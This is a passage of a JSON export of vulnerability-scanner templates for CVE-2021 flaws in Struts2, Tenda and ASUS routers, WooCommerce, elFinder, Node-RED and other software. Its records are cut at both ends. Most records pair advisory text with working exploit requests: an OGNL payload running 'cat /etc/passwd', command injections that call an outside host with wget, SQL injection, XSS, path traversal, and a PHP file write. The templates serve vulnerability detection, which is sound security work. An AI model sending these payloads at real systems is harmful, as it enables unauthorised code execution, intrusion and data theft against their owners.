html:\"/_common/lvl5/dologin.jsp\"\n tags: cve2021,cve,webctrl,xss,packetstorm,automatedlogic\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\">'\n - 'common/lvl5'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022045824ff16ba16cb21de7b21e60ac029eb7fda55842dad99fc023a5ee7f91376e02201d497628c7f2ade3b6b6b9dcf46184a710305a6d3461abb2b4ef0e4d643ca3f9:922c64590222798bb761d5b6d8e72950", "hash": "919571e0d8d72c753d2929278a634f6a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308351" }, "name": "CVE-2021-31755.yaml", "content": "id: CVE-2021-31755\n\ninfo:\n name: Tenda Router AC11 - Remote Command Injection\n author: gy741\n severity: critical\n description: Tenda Router AC11 is susceptible to remote command injection vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, data exfiltration, and complete compromise of the affected router.\n remediation: |\n Apply the latest firmware update provided by Tenda to fix the remote command injection vulnerability (CVE-2021-31755).\n reference:\n - https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3\n - https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai\n - https://nvd.nist.gov/vuln/detail/CVE-2021-31755\n - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors\n - https://github.com/Yu3H0/IoT_CVE\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-31755\n cwe-id: CWE-787\n epss-score: 0.96978\n epss-percentile: 0.99717\n cpe: 
cpe:2.3:o:tenda:ac11_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: tenda\n product: ac11_firmware\n tags: cve2021,cve,tenda,rce,oast,router,mirai,kev\n\nhttp:\n - raw:\n - |\n POST /goform/setmac HTTP/1.1\n Host: {{Hostname}}\n Origin: {{BaseURL}}\n Referer: {{BaseURL}}/index.htmlr\n Content-Type: application/x-www-form-urlencoded\n\n module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{{interactsh-url}}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4a0a00473045022024dea9a3df7016acc7f7259f997886586c771dce081949605bfc5a966edd61ac022100dbed0c4ff5dca2ef9cc708946e75516b5994715572b6dbe6f3e4c8479cdb8c8c:922c64590222798bb761d5b6d8e72950", "hash": "7e588f37a852a3fa70d2c4a4ef8c490e", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308352" }, "name": "CVE-2021-31805.yaml", "content": "id: CVE-2021-31805\n\ninfo:\n name: Apache Struts2 S2-062 - Remote Code Execution\n author: taielab\n severity: critical\n description: Apache Struts2 S2-062 is vulnerable to remote code execution. 
The fix issued for CVE-2020-17530 (S2-061) was incomplete, meaning some of the tag's attributes could still perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax.\n impact: |\n Remote code execution\n remediation: Avoid using forced OGNL evaluation on untrusted user input, and/or upgrade to Struts 2.5.30 or greater which checks if expression evaluation won't lead to the double evaluation.\n reference:\n - https://cwiki.apache.org/confluence/display/WW/S2-062\n - https://github.com/Axx8/Struts2_S2-062_CVE-2021-31805\n - https://nvd.nist.gov/vuln/detail/CVE-2021-31805\n - http://www.openwall.com/lists/oss-security/2022/04/12/6\n - https://security.netapp.com/advisory/ntap-20220420-0001/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-31805\n cwe-id: CWE-917\n epss-score: 0.18558\n epss-percentile: 0.961\n cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: apache\n product: struts\n tags: cve2021,cve,apache,rce,struts,struts2,intrusive\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF\n Content-Length: 1095\n\n ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\n Content-Disposition: form-data; name=\"id\"\n\n %{\n (#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\n (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n (#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\n (#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n (#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\n 
(#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n (#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))\n }\n\n ------WebKitFormBoundaryl7d1B1aGsV2wcZwF—\n\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n# digest: 4a0a0047304502210099350b0b9e08a8c89bba1fb6dcfd7cc4a0a7a0220ffb6f74b0da393d51d218e90220480b82d744ec40d5ac5a7a57b6067c4579ba4fb210ad395f4b4a253cd802293c:922c64590222798bb761d5b6d8e72950", "hash": "6e580d8f8d8a6903a4869b829c1e817e", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308353" }, "name": "CVE-2021-31856.yaml", "content": "id: CVE-2021-31856\n\ninfo:\n name: Layer5 Meshery 0.5.2 - SQL Injection\n author: princechaddha\n severity: critical\n description: Layer5 Meshery 0.5.2 contains a SQL injection vulnerability in the REST API that allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns in models/meshery_pattern_persister.go).\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to a patched version of Layer5 Meshery or apply the necessary security patches to mitigate the SQL Injection vulnerability (CVE-2021-31856).\n reference:\n - https://github.com/ssst0n3/CVE-2021-31856\n - https://nvd.nist.gov/vuln/detail/CVE-2021-31856\n - https://meshery.io\n - https://github.com/layer5io/meshery/pull/2745\n - https://github.com/ssst0n3/my_vulnerabilities\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 
9.8\n cve-id: CVE-2021-31856\n cwe-id: CWE-89\n epss-score: 0.03274\n epss-percentile: 0.91056\n cpe: cpe:2.3:a:layer5:meshery:0.5.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: layer5\n product: meshery\n tags: cve2021,cve,sqli,layer5\nvariables:\n num: \"999999999\"\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5({{num}}))&page=0&page_size=0\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{md5({{num}})}}'\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221008282dd3dc0af4d7274665fcf07634a48fd7173a214d41c5e21e649c77c019c4e022100d945931cb64b065349eb9de7b7d95b3e6801dc81a762c39998d8215c3d7a6bb9:922c64590222798bb761d5b6d8e72950", "hash": "8e5e1608d663a4450eb92e8005dd76a2", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308354" }, "name": "CVE-2021-31862.yaml", "content": "id: CVE-2021-31862\n\ninfo:\n name: SysAid 20.4.74 - Cross-Site Scripting\n author: jas37\n severity: medium\n description: SysAid 20.4.74 contains a reflected cross-site scripting vulnerability via the KeepAlive.jsp stamp parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of SysAid or apply the vendor-provided security patch to mitigate the XSS vulnerability.\n reference:\n - https://github.com/RobertDra/CVE-2021-31862/blob/main/README.md\n - https://www.sysaid.com/product/on-premise/latest-release\n - https://nvd.nist.gov/vuln/detail/CVE-2021-31862\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-31862\n cwe-id: CWE-79\n epss-score: 0.00141\n 
epss-percentile: 0.48947\n cpe: cpe:2.3:a:sysaid:sysaid:20.4.74:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: sysaid\n product: sysaid\n tags: cve2021,cve,xss,sysaid\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E'\n\n matchers:\n - type: dsl\n dsl:\n - '(body == \"false \")'\n - 'status_code == 200'\n condition: and\n# digest: 490a004630440220695d58cf0fd21f4c1d710467e6b21c1e233c8de8bafe4a76b86ee296c287fa2a02205bc6ca3e58157209e19f18fbea88fdb9fd57c43fc67a858599a23a5186cceec2:922c64590222798bb761d5b6d8e72950", "hash": "a92be894c2d40644875baebc15bdd33c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308355" }, "name": "CVE-2021-32030.yaml", "content": "id: CVE-2021-32030\n\ninfo:\n name: ASUS GT-AC2900 - Authentication Bypass\n author: gy741\n severity: critical\n description: \"ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator application. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. 
An attacker-supplied value of '\\0' matches the device's default value of '\\0' in some situations.\"\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to the router's settings, allowing an attacker to modify configurations, intercept network traffic, or launch further attacks.\n remediation: |\n Apply the latest firmware update provided by ASUS to fix the authentication bypass vulnerability (CVE-2021-32030).\n reference:\n - https://www.atredis.com/blog/2021/4/30/asus-authentication-bypass\n - https://nvd.nist.gov/vuln/detail/CVE-2021-32030\n - https://github.com/atredispartners/advisories/blob/master/ATREDIS-2020-0010.md\n - https://www.asus.com/Networking-IoT-Servers/WiFi-Routers/ASUS-Gaming-Routers/RT-AC2900/HelpDesk_BIOS/\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-32030\n cwe-id: CWE-287\n epss-score: 0.48092\n epss-percentile: 0.9739\n cpe: cpe:2.3:o:asus:gt-ac2900_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: asus\n product: gt-ac2900_firmware\n tags: cve2021,cve,asus,auth-bypass,router\n\nhttp:\n - raw:\n - |\n GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1\n Host: {{Hostname}}\n User-Agent: asusrouter--\n Referer: {{BaseURL}}\n Cookie: asus_token=\\0Invalid; clickedItem_tab=0\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - application/json\n\n - type: word\n words:\n - \"get_cfg_clientlist\"\n - \"alias\"\n - \"model_name\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022017a99b0dbcb7156774fecefd56dc839f32ad4c10124e7b7c024b15913ce6edca0220272077c41feca50f7508d555d34b81f8063ea73eb3c1be6a19bdf83c0b6529bb:922c64590222798bb761d5b6d8e72950", "hash": "365725b313f0cf82b9f43f8d26e54ac8", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308356" }, "name": "CVE-2021-32172.yaml", 
"content": "id: CVE-2021-32172\n\ninfo:\n name: Maian Cart <=3.8 - Remote Code Execution\n author: pdteam\n severity: critical\n description: Maian Cart 3.0 to 3.8 via the elFinder file manager plugin contains a remote code execution vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade to a patched version of Maian Cart (>=3.8) to mitigate this vulnerability.\n reference:\n - https://dreyand.github.io/maian-cart-rce/\n - https://github.com/DreyAnd/maian-cart-rce\n - https://www.maianscriptworld.co.uk/critical-updates\n - https://nvd.nist.gov/vuln/detail/CVE-2021-32172\n - https://www.maianscriptworld.co.uk/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-32172\n cwe-id: CWE-862\n epss-score: 0.26906\n epss-percentile: 0.9666\n cpe: cpe:2.3:a:maianscriptworld:maian_cart:3.8:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n vendor: maianscriptworld\n product: maian_cart\n tags: cve2021,cve,rce,unauth,maian,intrusive,maianscriptworld\n\nhttp:\n - raw:\n - |\n GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n - |\n POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1\n Host: {{Hostname}}\n Accept: application/json, text/javascript, /; q=0.01\n Accept-Language: en-US,en;q=0.5\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e\n - |\n GET /product-downloads/{{randstr}}.php HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n\n matchers:\n - type: dsl\n dsl:\n - contains(body_3, \"{{randstr_1}}\")\n - status_code_3 == 200\n condition: and\n\n extractors:\n - type: regex\n name: hash\n group: 1\n regex:\n - '\"hash\"\\:\"(.*?)\"\\,'\n internal: true\n# digest: 
4a0a00473045022100f283d7d444b82bed6cb1b19183a7f8d6bd8a88b11fc96b76cf49b230e8411e33022031f36c8b57fef33da59619e15c70ed2bd9771ec966a72529b3de2267bc883b76:922c64590222798bb761d5b6d8e72950", "hash": "da1388d72db4557997eb205c49fc25ea", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308357" }, "name": "CVE-2021-3223.yaml", "content": "id: CVE-2021-3223\n\ninfo:\n name: Node RED Dashboard <2.26.2 - Local File Inclusion\n author: gy741,pikpikcu\n severity: high\n description: NodeRED-Dashboard before 2.26.2 is vulnerable to local file inclusion because it allows ui_base/js/..%2f directory traversal to read files.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.\n remediation: |\n Upgrade Node RED Dashboard to version 2.26.2 or later to mitigate the vulnerability.\n reference:\n - https://github.com/node-red/node-red-dashboard/issues/669\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223\n - https://github.com/node-red/node-red-dashboard/releases/tag/2.26.2\n - https://nvd.nist.gov/vuln/detail/CVE-2021-3223\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-3223\n cwe-id: CWE-22\n epss-score: 0.09614\n epss-percentile: 0.94637\n cpe: cpe:2.3:a:nodered:node-red-dashboard:*:*:*:*:*:node.js:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: nodered\n product: node-red-dashboard\n framework: node.js\n shodan-query: title:\"Node-RED\"\n fofa-query: title=\"Node-RED\"\n tags: cve,cve2021,node-red-dashboard,lfi,nodered,node.js\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd'\n - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js'\n\n matchers-condition: or\n matchers:\n - type: word\n part: body\n words:\n - 
\"Node-RED web server is listening\"\n\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n# digest: 4a0a0047304502201018efcf4dfa0c313545ef9790e0659cb28de43d8e02fbd289666a7bd7fa02eb022100baa7210d4d9a2b15c8410c84b98b928a6b2db3f6591f6a64b1e7eb32144c7b6a:922c64590222798bb761d5b6d8e72950", "hash": "042719648e8cc10e8f2c6ee269800101", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308358" }, "name": "CVE-2021-32305.yaml", "content": "id: CVE-2021-32305\n\ninfo:\n name: Websvn <2.6.1 - Remote Code Execution\n author: gy741\n severity: critical\n description: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n remediation: |\n Upgrade Websvn to version 2.6.1 or later to mitigate this vulnerability.\n reference:\n - https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html\n - https://github.com/websvnphp/websvn/pull/142\n - http://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-32305\n - https://github.com/HimmelAward/Goby_POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-32305\n cwe-id: CWE-78\n epss-score: 0.96624\n epss-percentile: 0.99551\n cpe: cpe:2.3:a:websvn:websvn:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: websvn\n product: websvn\n tags: cve,cve2021,websvn,rce,oast,packetstorm\n\nhttp:\n - raw:\n - |\n GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1\n Host: {{Hostname}}\n Accept-Encoding: gzip, deflate\n Accept: */*\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 
4a0a004730450221009ec1af813526ec351de2e4387e1431e02ad09de992301f04fd375ba73fb6f1a60220323dd195f75cbe7e968736f53295b34315c102e888ccae87108e2a25bcc60247:922c64590222798bb761d5b6d8e72950", "hash": "5a08d0553e5d5f950dbb07385bfca168", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308359" }, "name": "CVE-2021-32618.yaml", "content": "id: CVE-2021-32618\n\ninfo:\n name: Python Flask-Security - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: Python Flask-Security contains an open redirect vulnerability. Existing code validates that the URL specified in the next parameter is either relative or has the same network location as the requesting URL. Certain browsers accept and fill in the blanks of possibly incomplete or malformed URLs. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can craft a malicious URL that redirects users to a malicious website, leading to potential phishing attacks or the exploitation of other vulnerabilities.\n remediation: |\n Upgrade to the latest version of Python Flask-Security library to fix the open redirect vulnerability.\n reference:\n - https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c\n - https://github.com/Flask-Middleware/flask-security/issues/486\n - https://nvd.nist.gov/vuln/detail/CVE-2021-32618\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-32618\n cwe-id: CWE-601\n epss-score: 0.00113\n epss-percentile: 0.43765\n cpe: cpe:2.3:a:flask-security_project:flask-security:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: flask-security_project\n product: flask-security\n tags: cve2021,cve,redirect,flask,flask-security_project\n\nhttp:\n - method: GET\n 
path:\n - '{{BaseURL}}/login?next=\\\\\\interact.sh'\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 490a0046304402207acbef18aa0010bc58e52948c92c8959a2c354c33dc25185577d33bc3177847c0220208482a310a7fd0552de2030e8147b5a244bfed28dbb16a153d017b3f06bb690:922c64590222798bb761d5b6d8e72950", "hash": "8bbea25afa8873d29673eb20b6f3539c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30835a" }, "name": "CVE-2021-32682.yaml", "content": "id: CVE-2021-32682\n\ninfo:\n name: elFinder 2.1.58 - Remote Code Execution\n author: smaranchand\n severity: critical\n description: elFinder 2.1.58 is impacted by multiple remote code execution vulnerabilities that could allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: Update to elFinder 2.1.59 or later. 
As a workaround, ensure the connector is not exposed without authentication.\n reference:\n - https://smaranchand.com.np/2022/01/organization-vendor-application-security/\n - https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities\n - https://github.com/Studio-42/elFinder/security/advisories/GHSA-wph3-44rj-92pr\n - https://nvd.nist.gov/vuln/detail/CVE-2021-32682\n - https://github.com/Studio-42/elFinder/commit/a106c350b7dfe666a81d6b576816db9fe0899b17\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-32682\n cwe-id: CWE-22\n epss-score: 0.97293\n epss-percentile: 0.99854\n cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:*\n metadata:\n max-request: 9\n vendor: std42\n product: \"elfinder\"\n github: https://github.com/Studio-42/elFinder\n tags: cve2021,cve,elfinder,misconfig,rce,oss,std42\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/elfinder/elfinder-cke.html\"\n - \"{{BaseURL}}/assets/backend/elfinder/elfinder-cke.html\"\n - \"{{BaseURL}}/assets/elFinder-2.1.9/elfinder.html\"\n - \"{{BaseURL}}/assets/elFinder/elfinder.html\"\n - \"{{BaseURL}}/backend/elfinder/elfinder-cke.html\"\n - \"{{BaseURL}}/elfinder/elfinder-cke.html\"\n - \"{{BaseURL}}/uploads/assets/backend/elfinder/elfinder-cke.html\"\n - \"{{BaseURL}}/uploads/assets/backend/elfinder/elfinder.html\"\n - \"{{BaseURL}}/uploads/elfinder/elfinder-cke.html\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"elfinder\"\n - \"php/connector\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203fd374bcfc7e0d1fb114e43721e82391d332bf970a505b476c6a4f46234d245002202cda416ffb5f16ec23002766e43acc4da7b06bf2294d3e7524a492b53d52fa15:922c64590222798bb761d5b6d8e72950", "hash": "283d00cb979f99623a2273be6afd1237", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30835b" }, "name": "CVE-2021-32789.yaml", "content": 
"id: CVE-2021-32789\n\ninfo:\n name: WooCommerce Blocks 2.5 to 5.5 - Unauthenticated SQL Injection\n author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot\n severity: high\n description: |\n woocommerce-gutenberg-products-block is a feature plugin for WooCommerce Gutenberg Blocks. An SQL injection vulnerability impacts all WooCommerce sites running the WooCommerce Blocks feature plugin between version 2.5.0 and prior to version 2.5.16. Via a carefully crafted URL, an exploit can be executed against the `wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]` endpoint that allows the execution of a read only sql query. There are patches for many versions of this package, starting with version 2.5.16. There are no known workarounds aside from upgrading.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the affected system.\n remediation: |\n Update WooCommerce Blocks to version 5.6 or later to mitigate the vulnerability.\n reference:\n - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021\n - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx\n - https://securitynews.sonicwall.com/xmlpost/wordpress-woocommerce-plugin-sql-injection/\n - https://wpscan.com/vulnerability/0f2089dc-9376-4d7d-95a2-25c99526804a\n - https://nvd.nist.gov/vuln/detail/CVE-2021-32789\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-32789\n cwe-id: CWE-89\n epss-score: 0.09336\n epss-percentile: 0.94559\n cpe: cpe:2.3:a:automattic:woocommerce_blocks:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: automattic\n product: woocommerce_blocks\n framework: wordpress\n tags: cve2021,cve,wordpress,woocommerce,sqli,wp-plugin,wp,wpscan,automattic\n\nhttp:\n - method: GET\n path:\n - 
'{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'sqli-test'\n - 'attribute_counts'\n - 'price_range'\n - 'term'\n condition: and\n\n - type: word\n part: header\n words:\n - 'application/json'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b54f8925ab16f82ba44c482f52bbf32655fb597eb5e2db8ad27f277ea244319802200a1c5a6db552aab8186869b0a59c19879ec2a61824d28b7674831cdeca90ecaa:922c64590222798bb761d5b6d8e72950", "hash": "b0922a05036e21c64ea82dd1231c9264", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30835c" }, "name": "CVE-2021-32819.yaml", "content": "id: CVE-2021-32819\n\ninfo:\n name: Nodejs Squirrelly - Remote Code Execution\n author: pikpikcu\n severity: high\n description: |\n Nodejs Squirrelly is susceptible to remote code execution. Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. 
For complete details refer to the referenced GHSL-2021-023.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Update to the latest version of Nodejs Squirrelly template engine to mitigate the vulnerability.\n reference:\n - https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/\n - https://www.linuxlz.com/aqld/2331.html\n - https://blog.diefunction.io/vulnerabilities/ghsl-2021-023\n - https://nvd.nist.gov/vuln/detail/CVE-2021-32819\n - https://github.com/squirrellyjs/squirrelly/commit/c12418a026f73df645ba927fd29358efe02fed1e\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-32819\n cwe-id: CWE-200,NVD-CWE-noinfo\n epss-score: 0.82753\n epss-percentile: 0.98332\n cpe: cpe:2.3:a:squirrelly:squirrelly:8.0.8:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: squirrelly\n product: squirrelly\n tags: cve2021,cve,nodejs,rce,oast,squirrelly\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//'\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: Wget\"\n# digest: 4b0a00483046022100aa7ca2c92f79ac28fd2150b51227335436fd18e936100074e82d284f2198fd38022100cae16de21e1e26871dbb8f7a3b598d17d4ed865611dbec02cdc8e762181bcceb:922c64590222798bb761d5b6d8e72950", "hash": "88511fd02aa15f04a99762b69c22047e", "level": 